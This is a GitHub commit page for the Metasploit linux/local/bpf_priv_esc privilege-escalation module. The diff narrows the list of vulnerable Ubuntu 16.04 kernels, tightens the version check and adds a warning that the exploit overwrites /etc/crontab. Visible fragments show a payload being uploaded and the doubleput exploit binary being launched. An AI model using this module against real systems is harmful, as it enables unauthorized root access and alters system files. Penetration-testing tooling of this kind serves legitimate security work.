Skip to content
Permalink
Browse files

Land #12760, improvements to linux/local/bpf_priv_esc module

  • Loading branch information
busterb committed Dec 26, 2019
2 parents 4de482f + a7b6355 commit 8061cdf97420a98451dc5f0ca72aae4f8ee5a1ff
@@ -7,16 +7,16 @@
The target system must be compiled with `CONFIG_BPF_SYSCALL`
and must not have `kernel.unprivileged_bpf_disabled` set to 1.

Note, this module will overwrite the first few lines
of `/etc/crontab` with a new cron job. The job will
need to be manually removed.


## Vulnerable Application

This module has been tested successfully on:

* Ubuntu 16.04 (x64) kernel 4.4.0-21-generic (default kernel)
* Ubuntu 16.04 (x64) kernel 4.4.0-38-generic
* Ubuntu 16.04 (x64) kernel 4.4.0-42-generic
* Ubuntu 16.04 (x64) kernel 4.4.0-98-generic
* Ubuntu 16.04 (x64) kernel 4.4.0-140-generic

This module was not tested against, but may work against:

@@ -24,13 +24,12 @@ def initialize(info = {})
The target system must be compiled with `CONFIG_BPF_SYSCALL`
and must not have `kernel.unprivileged_bpf_disabled` set to 1.
This module has been tested successfully on:
Note, this module will overwrite the first few lines
of `/etc/crontab` with a new cron job. The job will
need to be manually removed.
Ubuntu 16.04 (x64) kernel 4.4.0-21-generic (default kernel);
Ubuntu 16.04 (x64) kernel 4.4.0-38-generic;
Ubuntu 16.04 (x64) kernel 4.4.0-42-generic;
Ubuntu 16.04 (x64) kernel 4.4.0-98-generic;
Ubuntu 16.04 (x64) kernel 4.4.0-140-generic.
This module has been tested successfully on Ubuntu 16.04 (x64)
kernel 4.4.0-21-generic (default kernel).
},
'License' => MSF_LICENSE,
'Author' =>
@@ -176,12 +175,21 @@ def upload_and_compile(path, data, gcc_args='')

def check
release = kernel_release
version = kernel_version

if Gem::Version.new(release.split('-').first) < Gem::Version.new('4.4') ||
Gem::Version.new(release.split('-').first) >= Gem::Version.new('4.5.5')
vprint_error "Kernel version #{release} is not vulnerable"
Gem::Version.new(release.split('-').first) > Gem::Version.new('4.5.5')
vprint_error "Kernel version #{release} #{version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Kernel version #{release} appears to be vulnerable"

if version.downcase.include?('ubuntu') && release =~ /^4\.4\.0-(\d+)-/
if $1.to_i > 21
vprint_error "Kernel version #{release} is not vulnerable"
return CheckCode::Safe
end
end
vprint_good "Kernel version #{release} #{version} appears to be vulnerable"

lib = cmd_exec('dpkg --get-selections | grep ^fuse').to_s
unless lib.include?('install')
@@ -516,6 +524,7 @@ def exploit
upload_and_chmodx(payload_path, generate_payload_exe)

print_status('Launching exploit. This may take up to 120 seconds.')
print_warning('This module adds a job to /etc/crontab which requires manual removal!')

register_dir_for_cleanup "#{base_dir}/fuse_mount"
cmd_exec "cd #{base_dir}; #{doubleput_path} & echo "

0 comments on commit 8061cdf

Please sign in to comment.
You can’t perform that action at this time.